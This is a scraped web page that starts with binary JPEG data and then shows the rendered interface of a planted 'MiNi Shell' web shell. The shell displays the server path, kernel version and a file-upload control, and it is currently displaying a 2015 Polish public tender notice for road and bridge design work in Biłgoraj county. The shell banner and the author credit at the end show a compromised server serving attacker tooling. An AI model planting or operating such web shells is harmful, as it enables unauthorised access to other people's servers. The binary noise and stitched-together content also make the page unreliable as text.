JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150512/109734-N-2015.html

<p class="kh_header"><b>Biłgoraj: opracowanie dokumentacji projektowej na przebudowy dróg powiatowych powiatu biłgorajskiego</b><br>
<b>Numer ogłoszenia: 109734 - 2015; data zamieszczenia: 12.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Biłgoraju , ul. gen. Sikorskiego 3, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6867079, faks 84 6881820.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpbilgoraj.bip.lublin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji projektowej na przebudowy dróg powiatowych powiatu biłgorajskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje wykonanie zadania pn:  opracowanie dokumentacji projektowej na przebudowy dróg powiatowych powiatu biłgorajskiego.
2. Zamówienie składa się z pięciu zadań:
Wykonawca może złożyć swoje oferty tylko na  dwa  wybrane przez siebie zadania.

Zad. 1 opracowanie dokumentacji projektowej na zadanie pn: poprawa dostępności komunikacyjnej ulic powiatowych: nr 2987L  Bohaterów Monte Cassino, nr 2974L  Długiej, nr 2984L Gen. Komorowskiego, nr 2996L Bolesława Prusa oraz nr 2965L Bankowej do dróg wojewódzkich nr 835 i nr 858 w Biłgoraju;
Zakres projektowanych robót obejmuje m. in.:
dr. nr 2987L ul. Bohaterów Monte Cassino, klasa drogi Z, w km 0+000 - 1+045  dł. 1045 mb, 
-  przebudowa nawierzchni;
-  przebudowa, remont i budowa chodników;
-  przebudowa i remont  parkingów i zatok;
-  wyznaczenie pasów dla rowerów;
-  oznakowanie poziome i pionowe;
-  poprawa geometrii skrzyżowań z drogami niższej kategorii;
- przebudowa sygnalizacji świetlnej na skrzyżowaniu z ul. Komorowskiego;
- przebudowa oświetlenia ulicznego;
- zabezpieczenie urządzeń obcych  kolidujących z przebudowywaną ulicą;
- poprawa odwodnienia ulicy (odwodnienie maksymalnie powierzchniowe, dodatkowe studzienki ściekowe z włączeniem do istniejącej kanalizacji deszczowej w ul. Wiejskiej);
- zabezpieczenie uzbrojenia;
dr. nr 2974L  ul. Długa, klasa drogi Z, w km 0+000- 1+199 , dł.1199 mb,  
-  przebudowa nawierzchni;
-  przebudowa, remont i budowa chodników;
-  przebudowa i remont  parkingów i zatok;
-  wyznaczenie pasów dla rowerów;
-  oznakowanie poziome i pionowe;
-  poprawa geometrii skrzyżowań z drogami niższej kategorii;
- przebudowa oświetlenia ulicznego;
- zabezpieczenie urządzeń obcych  kolidujących z przebudowywaną ulicą;
- poprawa odwodnienia ulicy (odwodnienie maksymalnie powierzchniowe, dodatkowe studzienki ściekowe z włączeniem do istniejącej kanalizacji deszczowej);
- zabezpieczenie uzbrojenia;
dr. nr 2984L Gen. Komorowskiego, klasa drogi Z, w km  0+000-0+894, dł. 894 mb,  
 -  przebudowa nawierzchni;
-  przebudowa, remont i budowa chodników;
-  przebudowa i remont  parkingów i zatok;
-  oznakowanie poziome i pionowe;
-  poprawa geometrii skrzyżowań z drogami niższej kategorii;
- przebudowa oświetlenia ulicznego;
- zabezpieczenie urządzeń obcych  kolidujących z przebudowywaną ulicą;
- poprawa odwodnienia ulicy (odwodnienie maksymalnie powierzchniowe, dodatkowe studzienki ściekowe z włączeniem do istniejącej kanalizacji deszczowej);
- zabezpieczenie uzbrojenia;
dr. nr 2996L Bolesława Prusa, klasa drogi Z,  w km  0+430-0+840  , dł. 410 mb,  
-  przebudowa nawierzchni;
-  przebudowa, remont i budowa chodników;
-  oznakowanie poziome i pionowe;
-  poprawa geometrii skrzyżowań z drogami niższej kategorii;
-  przebudowa oświetlenia ulicznego na odcinku od ul. Komorowskiego do ul.  
    Bartoszewskiego;
- zabezpieczenie urządzeń obcych  kolidujących z przebudowywaną ulicą;
- poprawa odwodnienia ulicy;
- poprawa odwodnienia ulicy (odwodnienie maksymalnie powierzchniowe, dodatkowe studzienki ściekowe z włączeniem do istniejącej kanalizacji deszczowej);
- zabezpieczenie uzbrojenia;
dr. nr 2965L Bankowa, klasa drogi L, w km 0+000-0+165, dł. 165 mb,  
-  przebudowa nawierzchni;
-  przebudowa, remont i budowa chodników;
-  oznakowanie poziome i pionowe;
-  poprawa geometrii skrzyżowań z drogami niższej kategorii;
- zabezpieczenie urządzeń obcych  kolidujących z przebudowywaną ulicą;
- poprawa odwodnienia ulicy (odwodnienie powierzchniowe);
- zabezpieczenie uzbrojenia;

Opracowania powinny zawierać (dla każdej ulicy)  oddzielnie:
a)  mapy do celów projektowych;
b)  projekt budowlano-wykonawczy przebudowy ulic  -  3 egz. wersja papierowa;
c)  specyfikacje techniczne wykonania i odbioru robót  - 2 egz. wersja  papierowa;
d)  kosztorys inwestorski  -  2 egz. wersja papierowa;
e)  przedmiar robót - 1 egz. wersja papierowa;
f)   projekt zmian stałej organizacji ruchu - 2 egz. wersja papierowa;
g)  niezbędne uzgodnienia,
        +  cały zakres  prac na płycie CD (opracowania graficzne w formacie  pdf., kosztorysy  w formacie xls).  

W tym zadaniu zakładamy zaprojektowanie ok. 500 mb kanalizacji deszczowej.
Zad. 2 opracowanie dokumentacji projektowej na zadanie pn: przebudowa ciągu dróg powiatowych nr 2962L i 2963L łączących trzy drogi wojewódzkie i trzy powiaty między sobą;
Zakres projektowanych robót obejmuje m. in.:
dr. nr 2962L  Harasiuki - Naklik, klasa drogi Z, w km 1+830-12+463, dł. 10633 mb;
- przebudowa nawierzchni;
- utwardzenie poboczy;
- poprawa geometrii skrzyżowań;
- poprawa bezpieczeństwa na skrzyżowaniu z dr. 2961L (znaki aktywne, chodnik, zatoka parkingowa);
- poprawa istniejącego odwodnienia;  
- remonty istniejących przepustów pod drogami;
- urządzenia bezpieczeństwa;
- oznakowanie poziome i pionowe;
 
dr. nr 2963L  Nowa Wieś - Lipiny Dolne, klasa drogi  L, w km 8+967-12+337, dł.  
    3370  mb;
- przebudowa nawierzchni;
- utwardzenie poboczy;
-  poprawa bezpieczeństwa w obrębie szkoły;
- poprawa geometrii skrzyżowań;
- poprawa istniejącego odwodnienia;  
- remonty istniejących przepustów pod drogą;
- urządzenia bezpieczeństwa;
- oznakowanie poziome i pionowe;
 
Opracowania powinny zawierać:
a)  podkłady mapowe ze składnicy geodezyjnej:
b)  projekt budowlano-wykonawczy przebudowy dróg  -  3 egz. wersja papierowa,
c)  specyfikacje techniczne wykonania i odbioru robót  - 2 egz. wersja  papierowa,
d)  kosztorys inwestorski  - 2 egz. wersja papierowa,
e)  przedmiar robót - 1 egz. wersja papierowa,
f)  projekt zmian stałej organizacji ruchu -  3 egz. wersja papierowa,
g)    niezbędne uzgodnienia,
        +  cały zakres  prac na płycie CD (opracowania graficzne w formacie  pdf., kosztorysy  w formacie xls).  

Zad. 3 opracowanie dokumentacji projektowej na zadanie pn: przebudowa drogi powiatowej nr 2943L Księżpol - Obsza łączącej dwie drogi wojewódzkie nr 849 i nr 863;
Zakres projektowanych robót obejmuje m. in.:
dr. nr 2943L Księżpol - Obsza, klasa drogi G, w km 15+622 - 17+825, dł. 2203 mb;
- przebudowa nawierzchni;
-  budowa chodnika o dł. ok. 1100 mb;
- utwardzenie poboczy; 
- poprawa odwodnienia;
- przebudowa przepustów pod drogą;
- urządzenia bezpieczeństwa;
- oznakowanie poziome i pionowe;

Opracowania powinny zawierać:
a)  mapy do celów projektowych,
b)  projekt budowlano-wykonawczy przebudowy drogi  -  5 egz. wersja papierowa,
c)  specyfikacje techniczne wykonania i odbioru robót  - 2 egz. wersja  papierowa,
d)  kosztorys inwestorski  - 2 egz. wersja papierowa,
e)  przedmiar robót - 1 egz. wersja papierowa,
f)  projekt zmian stałej organizacji ruchu -  3 egz. wersja papierowa,
g)    niezbędne uzgodnienia,
        +  cały zakres  prac na płycie CD (opracowania graficzne w formacie  pdf., kosztorysy  w formacie xls).  
   
Zad. 4  opracowanie dokumentacji projektowej na zadanie pn: przebudowa obiektów inżynierskich w ciągach dróg powiatowych wraz z dojazdami: przebudowa mostu w ciągu drogi powiatowej nr 2942L w m. Pisklaki;
Dane techniczne drogi:
dr. nr  2942L  Majdan Nowy - Pisklaki, klasa drogi  L, w km 0+000-5+150, 7+800-10+500 dł.  7850 mb,
- przebudowa nawierzchni;
- poprawa odwodnienia;
- przebudowa przepustów pod drogą;

Dane techniczne  mostu: 
Most przewidziany do przebudowy położony jest nad rzeką Tanew  w km 15+427 o numerze ewidencyjnym JNI01004006,  długość całkowita obiektu: 63,4 m, szerokość  całkowita: 7,28 m.
Układ statyczny obiektu: belkowy swobodnie podparty uciąglony, konstrukcja dźwigarów pełnościenna stalowa z belek walcowanych, podpory ramownicowe betonowo częściowo prefabrykowane posadowione na palach wbijanych z prefabrykatów betonowych. 
Zakres projektowanych robót obejmuje m. in.:
- naprawę izolacji płyty pomostu;
-  wykonanie płyt przejściowych;
- odtworzenie  nawierzchni na moście i dojazdach w km 15+297 - 15+615;
- montaż barieroporęczy  na moście oraz barier na dojazdach;
- wykonanie umocnienia skarp rzeki pod mostem.

Opracowania powinny zawierać (oddzielnie dla drogi  i mostu):
a) mapy do celów projektowych  w zakresie  przebudowy mostu;
b)  podkłady mapowe ze składnicy geodezyjnej dla przebudowy drogi:
c)  projekt budowlano-wykonawczy przebudowy mostu -  5 egz. wersja papierowa,
d) projekt budowlano-wykonawczy przebudowy drogi -  3 egz. wersja papierowa,
e)  specyfikacje techniczne wykonania i odbioru robót  - 2 egz. wersja papierowa,
f)  kosztorys inwestorski  - 2 egz. wersja papierowa,
g)  przedmiar robót - 1 egz. wersja papierowa,
h)   projekt zmian stałej organizacji ruchu - 2 egz. wersja papierowa,
i)  operat wodno-prawny w zakresie przebudowy mostu,
j) uzyskanie  decyzji o środowiskowych uwarunkowaniach w zakresie przebudowy  
     mostu,
k)  uzyskanie  pozwolenia wodnoprawnego w zakresie przebudowy mostu,
l)  niezbędne uzgodnienia,
        +  cały zakres  prac na płycie CD (opracowania graficzne w formacie  pdf., kosztorysy  w formacie xls).  


 
Zad. 5  opracowanie dokumentacji projektowej na zadanie pn: przebudowa dróg powiatowych nr 2810L i nr 2811L przebiegających przez obszar powiatu janowskiego i biłgorajskiego stanowiących  połączenie drogi krajowej nr 74 z drogą wojewódzką nr 835.     

Zakres projektowanych robót obejmuje m. in.:
dr. nr 2810L Chrzanów - Goraj (ul. Dymitra Gorajskiego, ul. Janowska), klasa drogi Z, w km 18+541 - 20+288, dł.1747 mb,
-  przebudowa nawierzchni;
-  przebudowa, remont i budowa chodników;
-  oznakowanie poziome i pionowe;
-  poprawa geometrii skrzyżowań;
- zabezpieczenie urządzeń obcych  kolidujących z przebudowywaną drogi;
- przebudowa przepustów pod drogą;
- zabezpieczenie skarp;

dr. nr 2811L Kocudza Górna - Goraj, klasa drogi L, w km 6+655-7+415, dł. 760 mb
- przebudowa nawierzchni;
- poprawa odwodnienia;

Opracowania powinny zawierać:
a)  mapy do celów projektowych;
b) projekt budowlano-wykonawczy przebudowy dróg -5  egz. wersja papierowa,
c)  specyfikacje techniczne wykonania i odbioru robót  -2 egz. wersja papierowa,
d)   kosztorys inwestorski  - 2 egz. wersja papierowa,
e)   przedmiar robót - 1 egz. wersja papierowa,
f)   projekt zmian stałej organizacji ruchu - 2 egz. wersja papierowa,
g)    niezbędne uzgodnienia,
        +  cały zakres  prac na płycie CD (opracowania graficzne w formacie  pdf., kosztorysy  w formacie xls)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% wartości zamówienia podstawowego, które będą  polegały na powtórzeniu robót będących przedmiotem zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.32.00.00-7, 71.32.23.00-4, 71.32.25.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp  - wg wzoru określonego w zał. nr 4.

2. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował  zasobami  niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy  wykonywaniu zamówienia oraz:
a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia,
c) charakteru stosunku jaki będzie łączył wykonawcę z innym podmiotem,
d) zakresu  i okresu udziału innego podmiotu w wykonywaniu zamówienia
o ile z treści zobowiązania do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia nie będą wynikach ww. dane.

3. Wykonawca do zobowiązań, o których mowa w punkcie  8.3 SIWZ  dołączy dokumenty potwierdzające umocowanie osób podpisujących  zobowiązanie  do reprezentowania podmiotu udostępniającego zasoby.
4. Pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie  ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii.

5. Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów złożonych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na  piśmie pod rygorem nieważności takiej zmiany.

2. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do oferty w przypadku wystąpienia niżej wymienionych okoliczności:
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b) zmiana obowiązującej stawki VAT;
c) zmiany obowiązującego prawa powodujące, że realizacja przedmiotu umowy w niezmienionej postaci stanie się niecelowa;
d) udokumentowana niezależna od zamawiającego i wykonawcy przewlekłość postępowania o uzyskanie od instytucji i urzędów dokumentów (np. pozwoleń, decyzji, uzgodnień) niezbędnych do realizacji umowy.
3. W przypadku każdej zmiany o której mowa powyżej po stronie wnoszącego propozycję zmian leży udokumentowanie powstałej okoliczności i pisemne przedłożenie drugiej stronie wniosku o zmianę terminu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpbilgoraj.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Biłgoraju, ul. Gen. Sikorskiego 3, pok nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2015 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Biłgoraju, ul. Gen. Sikorskiego 3, pok nr 2 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com